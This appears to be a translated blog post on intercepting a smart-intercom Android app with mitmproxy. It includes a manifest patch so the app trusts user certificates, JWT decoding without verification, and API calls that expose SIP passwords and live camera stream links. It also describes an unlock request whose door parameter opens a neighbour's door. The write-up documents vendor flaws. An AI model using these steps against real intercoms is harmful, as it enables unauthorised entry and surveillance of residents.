After reading the post KrupnikasThere was an idea to deal with mitmproxy and see how the backend of daily used mobile applications is arranged. The choice fell on the intercom application. After authorization, it allows you to open doors and answer video calls. What came of this and what holes I managed to find I will tell under the cut.Proxy settings
To analyze traffic, an approach called a man in the middle is often used. It consists in the fact that when connected to a local network, traffic from the analyzed device first goes to the computer on which it is decrypted and analyzed, and then it is encrypted back and sent to the server. To decrypt traffic, the most popular is the mitmproxy program. Installing mitmproxy was not a big deal.To view traffic from a mobile device, you need to connect to your home wifi from your phone and computer. Install mitmproxy on the computer and run. On the phone in the wifi settings, set the local address and computer port as a proxy server. Next, go to mitm.it from the phone and install a certificate that allows you to decrypt https requests. After these steps, requests from the browser became visible. Hooray! However, the next step was disappointment:A google search led to an open issue on the github . It turned out that, starting with API Level 24, applications no longer trust user certificates. Fortunately, you can get around this by unzipping apk and adding the following config to AndroidManifest.xml:<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="system" />
<certificates src="user" />
</trust-anchors>
</debug-overrides>
</network-security-config>
Moreover, there is a ready-made script on the github that does this automatically. So, download apk, patch script, set the adb install command and voila everything works.Traffic analysis
We see that requests are made to addresses of the form:https://{intercom-company-url}/api/
Two parameters are passed in the header:'api-version': '2',
'authorization': 'Bearer your.jwt.tokenβ
The first parameter is the api version, and the second is the authorization token. For authorization, a json web token is used, which consists of three parts: the header, payload and signature.Decode it with the command:pyjwt decode --no-verify your.jwt.token
see that payload contains account_id and exp. The exp field corresponds to the time the token was created, which allows you to generate tokens for different devices from one account.The most interesting for us are requests for a list of available intercoms and opening doors. When sending a request (I used python and the requests library) tohttps://{intercom-company-url}/api/customers/properties/{account_id}/intercoms
We get json containing a list of doorphones with fields:[
{
'id': ID,
'mode': MODE,
'sip_account': {'ex_user': USER_ID, 'proxy': PROXY, 'password': PSWD},
'video': [{'quality': 'low', 'source': 'rtsp:
}
]
In json id - doorphone identifier, mode - which door can be opened (possible values ββare one_door, left_door, right_door), sip account and a link to the video broadcast. Wow!Using the session initiation protocol (sip), video calls are made through the intercom. In the sip_account field we received id'shniki and passwords for intercoms to which our account has access. Calling them all the same does not work, since they are on the internal network. But the video field is interesting. It contains an external link to broadcast video from the camera. It is enough to open vlc, copy the link and you can look around the clock on the doorphone camera. Itβs not good to scatter such links!Next, we will figure out how to open the door. When you click on the door open button, the application sends a get request:https://{intercom-company-url}/api/customers/intercoms/{intercom_id}/unlock?door=left_door&id={intercom_id}
It turned out that the presence or absence of the id parameter does not affect anything, but door allows in the case of a doorphone with two doors to open not only your own, but also the next door of your choice.Sim-sim open!
Having figured out the api, I decided to do something useful. The result is an Android application that recognizes voice commands, and when it recognizes predefined commands like βsim-sim open,β it sends a request to open the corresponding door.findings
A smart intercom is good, but a safe and smart intercom is even better.